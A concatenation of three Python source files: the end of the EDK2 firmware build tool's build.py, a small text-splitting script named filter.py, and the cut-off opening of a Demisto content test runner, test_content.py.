GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
self.Progress.Stop("done!")
MaList = []
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.File == Module.File:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None: continue
MaList.append(Ma)
self.BuildModules.append(Ma)
if not Ma.IsBinaryModule:
self._Build(self.Target, Ma, BuildModule=True)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" % \
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa == None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser != None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
#
# Save temp tables to a TmpTableDict.
#
for Key in Wa.BuildDatabase._CACHE_:
if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
LaunchCommand(Wa.GenFdsCommand, os.getcwd())
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSecTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print >> toolsFile, ' '.join(guidedSectionTool)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
self.Db.Close()
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
self.BuildModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache == None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase == None:
Utils.gDependencyDatabase = {}
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList != None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'IPF', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. Less than 2 will disable multi-thread builds.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD','LIBRARY','FLASH','DEPEX','BUILD_FLAGS','FIXED_ADDRESS','HASH','EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
(Opt, Args) = Parser.parse_args()
return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose != None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet != None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug != None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile != None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile != None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile != None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag != None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
# Drop temp tables to avoid database locked.
for TmpTableName in TmpTableDict:
SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
TmpTableDict[TmpTableName].execute(SqlCommand)
#MyBuild.DumpBuildData()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError, X:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning, X:
# error from Fdf parser
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb != None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to edk2-devel@lists.01.org for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild != None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr)
MyBuild.Db.Close()
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
filter.py
|
import numpy as np
import os,re,sys
import threading
import goal_address
import linecache
np.random.seed(1337)
path='1.txt'
db = goal_address.connectdb2()
def file_name(file_dir):
for root, dirs, files in os.walk(file_dir):
return files
def process_line(line):
lineSpilt = line.split(' ',1)
str1="[\s+\.\!\/_,$%^*(+\"\']+|[+——!,。?、~@#¥%……&*()]+"
str2=""
string = re.sub(str1, str2, lineSpilt[0])
if(string!=''):
return lineSpilt[0]
goalLine=lineSpilt[1]
tmp = [float(val) for val in goalLine.strip('\n').rstrip().split(' ')]
x = np.array(tmp[0:])
for i in(range(100-len(x))):
x.append(0)
#sys.exit()
return tmp
else:
return False
#判断是否需要爬取
def check_exist(count):
check=True
if count.strip() == '':
return 0
else:
if(goal_address.check_goal(count,db)):
if(goal_address.check_verbs(count,db)):
return 1
def load(path):
f = open("../screen_content/"+path)
state=0
print(path)
for line in f:
state=0
words=line.split(' ',1)
f2 = open("../data_dividedby_area/" + words[0]+'.txt', 'a')
now_str=path+'||| '+words[1]
f2.write(now_str)
f2.close()
f.close()
os.remove("../screen_content/" + path)
files=file_name("../screen_content/")
for file in files:
if(file!='.DS_Store'):
load(file)
# t = threading.Thread(target=load(file), name=file)
# t.start()
# t.join()
|
test_content.py
|
from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
import datetime
from distutils.version import LooseVersion
import pytz
from google.cloud import storage
from google.api_core.exceptions import PreconditionFailed
from queue import Queue
from contextlib import contextmanager
import urllib3
import requests
import demisto_client.demisto_api
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
SERVER_URL = "https://{}"
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
"the instance_name argument in conf.json. The options are:\n{}"
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
LOCKS_PATH = 'content-locks'
BUCKET_NAME = os.environ.get('GCS_ARTIFACTS_BUCKET')
CIRCLE_BUILD_NUM = os.environ.get('CIRCLE_BUILD_NUM')
WORKFLOW_ID = os.environ.get('CIRCLE_WORKFLOW_ID')
CIRCLE_STATUS_TOKEN = os.environ.get('CIRCLECI_STATUS_TOKEN')
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
def options_handler():
parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
parser.add_argument('-s', '--server', help='The server URL to connect to')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-e', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
parser.add_argument('-t', '--slack', help='The token for slack', required=True)
parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
parser.add_argument('-g', '--buildName', help='The build name', required=True)
parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
parser.add_argument('-m', '--memCheck', type=str2bool,
help='Should trigger memory checks or not. The slack channel to check the data is: '
'dmst_content_nightly_memory_data', default=False)
parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
